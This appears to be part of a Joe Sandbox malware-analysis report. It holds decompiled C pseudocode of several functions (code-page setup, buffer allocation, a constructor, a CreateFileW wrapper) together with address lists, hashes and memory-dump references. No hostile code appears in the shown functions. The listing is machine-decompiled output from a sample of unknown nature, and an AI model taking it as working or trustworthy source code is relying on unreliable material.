														__eflags =  *_t72;
														if( *_t72 != 0) {
															continue;
														}
														goto L16;
													}
												}
												L16:
												_t73 = _t98 + 0x1a;
												_t87 = 0xfe;
												do {
													 *_t73 =  *_t73 | 0x00000008;
													_t73 =  &(_t73[1]);
													_t87 = _t87 - 1;
													__eflags = _t87;
												} while (_t87 != 0);
												 *(_t98 + 0x21c) = E00E8B1ED( *(_t98 + 4));
												 *(_t98 + 8) = _t78;
											}
											_t95 = _t98 + 0xc;
											asm("stosd");
											asm("stosd");
											asm("stosd");
											L36:
											E00E8B303(_t78, _t91, _t95, _t98, _t98); // executed
											L37:
											__eflags = 0;
										}
									}
								}
							}
						}
						goto L39;
					}
					E00E7F5F0(_t94, _t98 + 0x18, _t94, 0x101);
					_t54 = _v32 * 0x30;
					__eflags = _t54;
					_v36 = _t54;
					_t55 = _t54 + 0xe9e838;
					_v32 = _t55;
					do {
						__eflags =  *_t55;
						_t82 = _t55;
						if( *_t55 != 0) {
							while(1) {
								_t62 = _t82[1];
								__eflags = _t62;
								if(_t62 == 0) {
									break;
								}
								_t92 =  *_t82 & 0x000000ff;
								_t63 = _t62 & 0x000000ff;
								while(1) {
									__eflags = _t92 - _t63;
									if(_t92 > _t63) {
										break;
									}
									__eflags = _t92 - 0x100;
									if(_t92 < 0x100) {
										_t31 = _t94 + 0xe9e820; // 0x8040201
										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
										_t92 = _t92 + 1;
										__eflags = _t92;
										_t63 = _t82[1] & 0x000000ff;
										continue;
									}
									break;
								}
								_t82 =  &(_t82[2]);
								__eflags =  *_t82;
								if( *_t82 != 0) {
									continue;
								}
								break;
							}
							_t55 = _v32;
						}
						_t94 = _t94 + 1;
						_t55 = _t55 + 8;
						_v32 = _t55;
						__eflags = _t94 - 4;
					} while (_t94 < 4);
					 *(_t98 + 4) = _t78;
					 *(_t98 + 8) = 1;
					 *(_t98 + 0x21c) = E00E8B1ED(_t78);
					_t83 = _t98 + 0xc;
					_t91 = _v36 + 0xe9e82c;
					_t95 = 6;
					do {
						_t58 =  *_t91;
						_t91 = _t91 + 2;
						 *_t83 = _t58;
						_t83 = _t83 + 2;
						_t95 = _t95 - 1;
						__eflags = _t95;
					} while (_t95 != 0);
					goto L36;
				} else {
					E00E8B29E(_t98);
				}
				L39:
				return E00E7EEFA(_v8 ^ _t99);
			}

0x00e8b668
0x00e8b66f
0x00e8b677
0x00e8b67f
0x00e8b684
0x00e8b695
0x00e8b695
0x00e8b697
0x00e8b699
0x00e8b69b
0x00e8b69e
0x00e8b69e
0x00e8b6a4
0x00000000
0x00000000
0x00e8b6aa
0x00e8b6ab
0x00e8b6ae
0x00e8b6b1
0x00e8b6b6
0x00000000
0x00e8b6b8
0x00e8b6b8
0x00e8b6be
0x00e8b78c
0x00e8b6c4
0x00e8b6c4
0x00e8b6ca
0x00000000
0x00e8b6d0
0x00e8b6d4
0x00e8b6da
0x00e8b6dc
0x00000000
0x00e8b6e2
0x00e8b6e7
0x00e8b6ed
0x00e8b6ef
0x00e8b779
0x00e8b77f
0x00000000
0x00e8b781
0x00e8b782
0x00000000
0x00e8b782
0x00e8b6f5
0x00e8b6ff
0x00e8b704
0x00e8b70c
0x00e8b712
0x00e8b713
0x00e8b716
0x00e8b769
0x00e8b718
0x00e8b718
0x00e8b71c
0x00e8b71f
0x00e8b721
0x00e8b721
0x00e8b724
0x00e8b726
0x00000000
0x00000000
0x00e8b728
0x00e8b72b
0x00e8b736
0x00e8b736
0x00e8b738
0x00000000
0x00000000
0x00e8b730
0x00e8b735
0x00e8b735
0x00e8b735
0x00e8b73a
0x00e8b73d
0x00e8b740
0x00000000
0x00000000
0x00000000
0x00e8b740
0x00e8b721
0x00e8b742
0x00e8b742
0x00e8b745
0x00e8b74a
0x00e8b74a
0x00e8b74d
0x00e8b74e
0x00e8b74e
0x00e8b74e
0x00e8b75e
0x00e8b764
0x00e8b764
0x00e8b76e
0x00e8b771
0x00e8b772
0x00e8b773
0x00e8b837
0x00e8b838
0x00e8b83d
0x00e8b83e
0x00e8b83e
0x00e8b6ef
0x00e8b6dc
0x00e8b6ca
0x00e8b6be
0x00000000
0x00e8b840
0x00e8b79e
0x00e8b7a6
0x00e8b7a6
0x00e8b7aa
0x00e8b7ad
0x00e8b7b3
0x00e8b7b6
0x00e8b7b6
0x00e8b7b9
0x00e8b7bb
0x00e8b7bd
0x00e8b7bd
0x00e8b7c0
0x00e8b7c2
0x00000000
0x00000000
0x00e8b7c4
0x00e8b7c7
0x00e8b7e3
0x00e8b7e3
0x00e8b7e5
0x00000000
0x00000000
0x00e8b7cc
0x00e8b7d2
0x00e8b7d4
0x00e8b7da
0x00e8b7de
0x00e8b7de
0x00e8b7df
0x00000000
0x00e8b7df
0x00000000
0x00e8b7d2
0x00e8b7e7
0x00e8b7ea
0x00e8b7ed
0x00000000
0x00000000
0x00000000
0x00e8b7ed
0x00e8b7ef
0x00e8b7ef
0x00e8b7f2
0x00e8b7f3
0x00e8b7f6
0x00e8b7f9
0x00e8b7f9
0x00e8b7ff
0x00e8b802
0x00e8b811
0x00e8b81a
0x00e8b81f
0x00e8b825
0x00e8b826
0x00e8b826
0x00e8b829
0x00e8b82c
0x00e8b82f
0x00e8b832
0x00e8b832
0x00e8b832
0x00000000
0x00e8b686
0x00e8b687
0x00e8b68d
0x00e8b841
0x00e8b850

APIs

Part of subcall function 00E8B22B: GetOEMCP.KERNEL32(00000000,?,?,00E8B4B4,?), ref: 00E8B256

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00E8B4F9,?,00000000), ref: 00E8B6D4
GetCPInfo.KERNEL32(00000000,00E8B4F9,?,?,?,00E8B4F9,?,00000000), ref: 00E8B6E7

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: da543e9aa5a41cfd34f99791935ba01d92bfba932fbc4b90b941adc73f0c900a
Instruction ID: f0afc06536196c207abfb495021658e7c88c5ef86b92c1f828596028482222ac
Opcode Fuzzy Hash: da543e9aa5a41cfd34f99791935ba01d92bfba932fbc4b90b941adc73f0c900a
Instruction Fuzzy Hash: 125136749003059FDB24EF75C8816BABBE5EF81304F14626FD09EAB262D7369949CB80

Uniqueness

Uniqueness Score: -1.00%

Function 00E72E9E Relevance: 3.1, APIs: 2, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00E72E9E(void* __ebx, void* __ecx, void* __ebp, intOrPtr _a4, char _a8) {
				char _v12;
				signed int _v16;
				char _v17;
				signed int _v28;
				void* __edi;
				intOrPtr _t48;
				signed int _t49;
				signed int _t59;
				intOrPtr _t68;
				void* _t71;
				signed int _t75;
				signed int* _t77;
				void* _t89;
				void* _t91;
				signed int _t95;
				signed int* _t97;
				void* _t99;
				signed int _t100;
				void* _t102;
				void* _t103;

				_t99 = __ebp;
				_t72 = __ecx;
				_t103 = _t102 - 0x14;
				_t68 = _a4;
				_t89 = __ecx;
				if(_t68 == 0) {
					_t72 = 0xea0f50;
					E00E66EDC(0xea0f50);
				}
				_t48 = 0x40000;
				if(_t68 < 0x40000) {
					_t68 = 0x40000;
					_a4 = 0x40000;
				}
				if(_t68 <=  *((intOrPtr*)(_t89 + 0xe6d8))) {
					L29:
					return _t48;
				} else {
					if(_a8 == 0 ||  *(_t89 + 0x4b40) == 0 &&  *((char*)(_t89 + 0x4c44)) == 0) {
						_v17 = 0;
						goto L11;
					} else {
						_v17 = 1;
						if( *((char*)(_t89 + 0x4c44)) == 0) {
							L11:
							_push(_t99);
							if( *((char*)(_t89 + 0x4c44)) == 0) {
								_push(_t68); // executed
								_t49 = E00E838A3(_t72); // executed
								_t100 = _t49;
								if(_t100 != 0) {
									goto L19;
								} else {
									goto L14;
								}
							} else {
								_t100 = 0;
								L14:
								if(_v17 != 0 || _t68 < 0x1000000) {
									goto L31;
								} else {
									_t60 =  *(_t89 + 0x4b40);
									if( *(_t89 + 0x4b40) != 0) {
										L00E8389E(_t60);
										 *(_t89 + 0x4b40) =  *(_t89 + 0x4b40) & 0x00000000;
									}
									E00E72DD7(_t68, _t89 + 0x4b44, _t100, _t68);
									 *((char*)(_t89 + 0x4c44)) = 1;
									L19:
									if( *((char*)(_t89 + 0x4c44)) == 0) {
										E00E7F5F0(_t89, _t100, 0, _t68);
										_t103 = _t103 + 0xc;
										if(_v17 != 0 &&  *((intOrPtr*)(_t89 + 0xe6d8)) >= 1) {
											_t75 = _t68 - 1;
											_v16 = _t75;
											_t71 = 1;
											do {
												_t95 =  *((intOrPtr*)(_t89 + 0x7c)) - _t71;
												_t71 = _t71 + 1;
												 *((char*)((_t75 & _t95) + _t100)) =  *((intOrPtr*)(( *((intOrPtr*)(_t89 + 0xe6d8)) - 0x00000001 & _t95) +  *(_t89 + 0x4b40)));
												_t75 = _v16;
											} while (_t71 <=  *((intOrPtr*)(_t89 + 0xe6d8)));
											_t68 = _a4;
										}
										_t51 =  *(_t89 + 0x4b40);
										if( *(_t89 + 0x4b40) != 0) {
											L00E8389E(_t51);
										}
										 *(_t89 + 0x4b40) = _t100;
									}
									_t48 = _t68 - 1;
									 *((intOrPtr*)(_t89 + 0xe6d8)) = _t68;
									 *((intOrPtr*)(_t89 + 0xe6dc)) = _t48;
									goto L29;
								}
							}
						} else {
							E00E71D08( &_v12);
							E00E818C8( &_v12, 0xe9b704);
							L31:
							_t77 =  &_v12;
							E00E71D08(_t77);
							E00E818C8( &_v12, 0xe9b704);
							asm("int3");
							_push(_t93);
							_t97 = _t77;
							_push(_t89);
							_t91 = 4;
							_t97[1] = _t97[1] & 0x00000000;
							 *_t97 =  *_t97 & 0x00000000;
							_t97[2] = _t97[2] | 0xffffffff;
							_t97[6] = _v28;
							do {
								_t59 = E00E72C3D(_t97[6]);
								_t97[1] = _t97[1] << 0x00000008 | _t59;
								_t91 = _t91 - 1;
							} while (_t91 != 0);
							return _t59;
						}
					}
				}
			}

0x00e72e9e
0x00e72e9e
0x00e72e9e
0x00e72ea2
0x00e72ea7
0x00e72eab
0x00e72ead
0x00e72eb2
0x00e72eb2
0x00e72eb7
0x00e72ebe
0x00e72ec0
0x00e72ec2
0x00e72ec2
0x00e72ecc
0x00e72fe5
0x00e72fea
0x00e72ed2
0x00e72ed7
0x00e72efe
0x00000000
0x00e72eeb
0x00e72ef2
0x00e72ef7
0x00e72f03
0x00e72f0a
0x00e72f0b
0x00e72f11
0x00e72f12
0x00e72f17
0x00e72f1c
0x00000000
0x00000000
0x00000000
0x00000000
0x00e72f0d
0x00e72f0d
0x00e72f1e
0x00e72f23
0x00000000
0x00e72f35
0x00e72f35
0x00e72f3d
0x00e72f40
0x00e72f45
0x00e72f4c
0x00e72f54
0x00e72f59
0x00e72f60
0x00e72f67
0x00e72f6d
0x00e72f72
0x00e72f7a
0x00e72f85
0x00e72f8a
0x00e72f8e
0x00e72f90
0x00e72f99
0x00e72fa6
0x00e72faa
0x00e72fad
0x00e72fb1
0x00e72fb9
0x00e72fbd
0x00e72fbe
0x00e72fc6
0x00e72fc9
0x00e72fce
0x00e72fcf
0x00e72fcf
0x00e72fd5
0x00e72fd8
0x00e72fde
0x00000000
0x00e72fe4
0x00e72f23
0x00e72ef9
0x00e72ff1
0x00e73000
0x00e73005
0x00e73005
0x00e73009
0x00e73018
0x00e7301d
0x00e73022
0x00e73023
0x00e73025
0x00e73028
0x00e73029
0x00e7302d
0x00e73030
0x00e73034
0x00e73037
0x00e7303a
0x00e73047
0x00e7304a
0x00e7304a
0x00e73051
0x00e73051
0x00e72ef7
0x00e72ed7

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00E73000
__CxxThrowException@8.LIBVCRUNTIME ref: 00E73018

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: Exception@8Throw
String ID:
API String ID: 2005118841-0
Opcode ID: 65448de1bb8d44e6afcbac616b7e94ddfbb3d622eef7d0f0a080b3b71c632bc0
Instruction ID: 393b8bf47303459636d3ff84691298343cb0948d95781d74ff491f4f330f8f14
Opcode Fuzzy Hash: 65448de1bb8d44e6afcbac616b7e94ddfbb3d622eef7d0f0a080b3b71c632bc0
Instruction Fuzzy Hash: A14104B0B083816BE72CEA74E484B96F7E4FB94308F04A66EE65C73182D770A854C795

Uniqueness

Uniqueness Score: -1.00%

Function 00E613A7 Relevance: 3.1, APIs: 2, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00E613A7(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t56;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00E7E554(_t56, _t91);
				_push(_t78);
				_push(_t78);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00E697B6(_t78);
				 *_t89 = 0xe935b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00E65FD7(_t89 + 0x1028, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00E6CA2B(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00E61541();
				_t62 = E00E61541();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00E7E512(_t86, _t89, _t98, 0x82f0);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00E6B26D(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x22)) =  *((intOrPtr*)(_t64 + 0x61a1));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00E7F5F0(_t87, _t89 + 0x2208, 0, 0x40);
				E00E7F5F0(_t87, _t89 + 0x2248, 0, 0x34);
				E00E7F5F0(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00e613a7
0x00e613a7
0x00e613a7
0x00e613a7
0x00e613a7
0x00e613ac
0x00e613ad
0x00e613b0
0x00e613b2
0x00e613b5
0x00e613bc
0x00e613c8
0x00e613cb
0x00e613d6
0x00e613da
0x00e613e5
0x00e613eb
0x00e613f1
0x00e613fc
0x00e61404
0x00e61408
0x00e6140b
0x00e61411
0x00e61417
0x00e61419
0x00e6143e
0x00e6141b
0x00e61420
0x00e61426
0x00e61429
0x00e6142f
0x00e6143a
0x00e61431
0x00e61433
0x00e61433
0x00e6142f
0x00e61441
0x00e6144d
0x00e61454
0x00e6145b
0x00e61464
0x00e6146f
0x00e61479
0x00e6147f
0x00e61485
0x00e6148b
0x00e61491
0x00e61497
0x00e6149d
0x00e614a4
0x00e614aa
0x00e614b0
0x00e614b6
0x00e614bc
0x00e614c2
0x00e614d1
0x00e614e0
0x00e614eb
0x00e614f3
0x00e614f9
0x00e614ff
0x00e61505
0x00e6150b
0x00e61511
0x00e61517
0x00e61520
0x00e61526
0x00e6152c
0x00e61534
0x00e6153e

APIs

__EH_prolog.LIBCMT ref: 00E613A7

Part of subcall function 00E65FD7: __EH_prolog.LIBCMT ref: 00E65FDC

Part of subcall function 00E6CA2B: __EH_prolog.LIBCMT ref: 00E6CA30
Part of subcall function 00E6CA2B: new.LIBCMT ref: 00E6CA73
Part of subcall function 00E6CA2B: new.LIBCMT ref: 00E6CA97

new.LIBCMT ref: 00E61420

Part of subcall function 00E6B26D: __EH_prolog.LIBCMT ref: 00E6B272

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: bdeae836c14965b11391f43888aa4c870d4692cdde0e7ec15643a92de0043aa8
Instruction ID: 784d87ac3fb5f20aaec1a29ff4cfb22f823319071d5037ded8e801fb05b9d0a6
Opcode Fuzzy Hash: bdeae836c14965b11391f43888aa4c870d4692cdde0e7ec15643a92de0043aa8
Instruction Fuzzy Hash: B44174B0845B409EE720CF798485AE7FBE5FF18300F545A6ED5EE93282DB326654CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00E613A2 Relevance: 3.1, APIs: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E613A2(intOrPtr* __ecx, void* __edx, void* __edi, void* __eflags) {
				void* __esi;
				signed int _t62;
				signed int _t63;
				char _t64;
				intOrPtr _t74;
				intOrPtr* _t78;
				void* _t86;
				void* _t87;
				intOrPtr* _t89;
				void* _t91;
				void* _t96;

				_t96 = __eflags;
				_t87 = __edi;
				_t86 = __edx;
				_t78 = __ecx;
				E00E7E554(E00E91F77, _t91);
				_t89 = _t78;
				 *((intOrPtr*)(_t91 - 0x10)) = _t89;
				E00E697B6(_t78);
				 *_t89 = 0xe935b8;
				 *((intOrPtr*)(_t91 - 4)) = 0;
				E00E65FD7(_t89 + 0x1028, _t86, _t96);
				 *((char*)(_t91 - 4)) = 1;
				E00E6CA2B(_t89 + 0x20e8, _t86, _t96);
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				E00E61541();
				_t62 = E00E61541();
				 *((char*)(_t91 - 4)) = 4;
				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
				 *((intOrPtr*)(_t89 + 0x21bc)) = 0;
				 *(_t89 + 0x21b8) = _t63;
				_t98 = _t63;
				if(_t63 == 0) {
					_t64 =  *((intOrPtr*)(_t91 + 8));
				} else {
					_t74 = E00E7E512(_t86, _t89, _t98, 0x82f0);
					 *((intOrPtr*)(_t91 - 0x14)) = _t74;
					 *((char*)(_t91 - 4)) = 5;
					if(_t74 == 0) {
						_t64 = 0;
					} else {
						_t64 = E00E6B26D(_t74); // executed
					}
				}
				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
				 *((char*)(_t89 + 0x22)) =  *((intOrPtr*)(_t64 + 0x61a1));
				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
				 *((char*)(_t89 + 0x6cbc)) = 0;
				 *((short*)(_t89 + 0x6cc4)) = 0;
				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
				E00E7F5F0(_t87, _t89 + 0x2208, 0, 0x40);
				E00E7F5F0(_t87, _t89 + 0x2248, 0, 0x34);
				E00E7F5F0(_t87, _t89 + 0x4590, 0, 0x20);
				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
				 *((short*)(_t89 + 0x6cfa)) = 0;
				 *((char*)(_t89 + 0x6cd6)) = 0;
				 *((char*)(_t89 + 0x6cf8)) = 0;
				 *((char*)(_t89 + 0x21e0)) = 0;
				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
				return _t89;
			}

0x00e613a2
0x00e613a2
0x00e613a2
0x00e613a2
0x00e613a7
0x00e613b0
0x00e613b2
0x00e613b5
0x00e613bc
0x00e613c8
0x00e613cb
0x00e613d6
0x00e613da
0x00e613e5
0x00e613eb
0x00e613f1
0x00e613fc
0x00e61404
0x00e61408
0x00e6140b
0x00e61411
0x00e61417
0x00e61419
0x00e6143e
0x00e6141b
0x00e61420
0x00e61426
0x00e61429
0x00e6142f
0x00e6143a
0x00e61431
0x00e61433
0x00e61433
0x00e6142f
0x00e61441
0x00e6144d
0x00e61454
0x00e6145b
0x00e61464
0x00e6146f
0x00e61479
0x00e6147f
0x00e61485
0x00e6148b
0x00e61491
0x00e61497
0x00e6149d
0x00e614a4
0x00e614aa
0x00e614b0
0x00e614b6
0x00e614bc
0x00e614c2
0x00e614d1
0x00e614e0
0x00e614eb
0x00e614f3
0x00e614f9
0x00e614ff
0x00e61505
0x00e6150b
0x00e61511
0x00e61517
0x00e61520
0x00e61526
0x00e6152c
0x00e61534
0x00e6153e

APIs

__EH_prolog.LIBCMT ref: 00E613A7

Part of subcall function 00E65FD7: __EH_prolog.LIBCMT ref: 00E65FDC

Part of subcall function 00E6CA2B: __EH_prolog.LIBCMT ref: 00E6CA30
Part of subcall function 00E6CA2B: new.LIBCMT ref: 00E6CA73
Part of subcall function 00E6CA2B: new.LIBCMT ref: 00E6CA97

new.LIBCMT ref: 00E61420

Part of subcall function 00E6B26D: __EH_prolog.LIBCMT ref: 00E6B272

Memory Dump Source

Source File: 00000000.00000002.263743694.0000000000E61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E60000, based on PE: true

Associated: 00000000.00000002.263739226.0000000000E60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263762790.0000000000E93000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000E9E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EA4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263771557.0000000000EC1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.263787457.0000000000EC2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e60000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 875af7af517b01e53508daa3658b7c8dedf12c5f5bd3b59f937fc4e4ed67b88c
Instruction ID: 9615c5bd7f1e716ed823437a0ad94dbf2fb8d0441829286c901d8230958a7098
Opcode Fuzzy Hash: 875af7af517b01e53508daa3658b7c8dedf12c5f5bd3b59f937fc4e4ed67b88c
Instruction Fuzzy Hash: CE4165B0845B449EE724CF798485AE7FBE5FF18300F545A6ED1EE93282DB322654CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00E698BE Relevance: 3.1, APIs: 2, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E698BE(void* __ecx, short _a4, WCHAR* _a4104, signed char _a4108) {
				long _v0;
				signed char _t34;
				signed int _t36;
				void* _t37;
				signed char _t46;
				struct _SECURITY_ATTRIBUTES* _t47;
				long _t56;
				void* _t59;
				long _t63;

				E00E7E630();
				_t46 = _a4108;
				_t34 = _t46 >> 0x00000001 & 0x00000001;
				_t59 = __ecx;
				if((_t46 & 0x00000010) != 0 ||  *((char*)(__ecx + 0x22)) != 0) {
					_t63 = 1;
					__eflags = 1;
				} else {
					_t63 = 0;
				}
				 *(_t59 + 0x1c) = _t46;
				_v0 = ((0 | _t34 == 0x00000000) - 0x00000001 & 0x80000000) + 0xc0000000;
				_t36 =  *(E00E6BE6D(_t34, _a4104)) & 0x0000ffff;
				if(_t36 == 0x2e || _t36 == 0x20) {
					if((_t46 & 0x00000020) != 0) {
						goto L8;
					} else {
						 *(_t59 + 4) =  *(_t59 + 4) | 0xffffffff;
						_t47 = 0;
						_t56 = _v0;
					}
				} else {
					L8:
					_t56 = _v0;
					_t47 = 0;
					__eflags = 0;
					_t37 = CreateFileW(_a4104, _t56, _t63, 0, 2, 0, 0); // executed
					 *(_t59 + 4) = _t37;
				}
				if( *(_t59 + 4) == 0xffffffff && E00E6B85C(_a4104,  &_a4, 0x800) != 0) {
					 *(_t59 + 4) = CreateFileW( &_a4, _t56, _t63, _t47, 2, _t47, _t47);
				}
				 *((char*)(_t59 + 0x18)) = 1;
				 *(_t59 + 0xc) = _t47;
				 *(_t59 + 0x10) = _t47;
				return E00E70131(_t59 + 0x24, _a4104, 0x800) & 0xffffff00 |  *(_t59 + 4) != 0xffffffff;
			}

0x00e698c3
0x00e698c9
0x00e698d6
0x00e698d8
0x00e698de
0x00e698ec
0x00e698ec
0x00e698e6
0x00e698e6
0x00e698e6
0x00e698f6
0x00e6990b
0x00e69914
0x00e6991a
0x00e69924
0x00000000
0x00e69926
0x00e69926
0x00e6992a
0x00e6992c
0x00e6992c
0x00e69932
0x00e69932
0x00e69932
0x00e69936
0x00e69936
0x00e69946
0x00e6994c
0x00e6994c
0x00e69953
0x00e69981
0x00e69981
0x00e69993
0x00e69998
0x00e6999b
